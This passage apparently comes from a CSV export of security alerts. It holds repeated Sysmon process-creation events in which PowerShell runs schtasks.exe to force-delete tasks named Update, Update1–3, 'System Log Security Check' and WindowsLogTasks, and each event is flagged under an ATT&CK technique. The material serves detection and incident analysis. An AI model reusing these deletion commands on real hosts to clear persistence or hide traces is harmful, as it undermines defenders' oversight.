-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.369",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.016 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010e5e11900} +ProcessId: 5384 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.018597700Z"",""eventRecordID"":""2233"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.016\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010e5e11900}\r\nProcessId: 5384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 
/F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.016"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010e5e11900}"",""processId"":""5384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:18:05.339",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.990 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-00100be01900} +ProcessId: 3984 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.993811100Z"",""eventRecordID"":""2232"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.990\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-00100be01900}\r\nProcessId: 3984\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.990"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-00100be01900}"",""processId"":""3984"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.321",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.950 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001023de1900} +ProcessId: 6752 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.953636600Z"",""eventRecordID"":""2231"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.950\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001023de1900}\r\nProcessId: 6752\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.950"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001023de1900}"",""processId"":""6752"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.290",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.908 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001093dc1900} +ProcessId: 5728 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.911135800Z"",""eventRecordID"":""2230"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.908\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001093dc1900}\r\nProcessId: 5728\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:36.908"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001093dc1900}"",""processId"":""5728"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.275",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.876 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001003db1900} +ProcessId: 5616 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.882735200Z"",""eventRecordID"":""2229"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.876\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001003db1900}\r\nProcessId: 5616\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.876"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001003db1900}"",""processId"":""5616"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.259",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.845 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001074d91900} +ProcessId: 6864 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating 
System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.848329300Z"",""eventRecordID"":""2228"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.845\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001074d91900}\r\nProcessId: 6864\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.845"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001074d91900}"",""processId"":""6864"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.243",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 
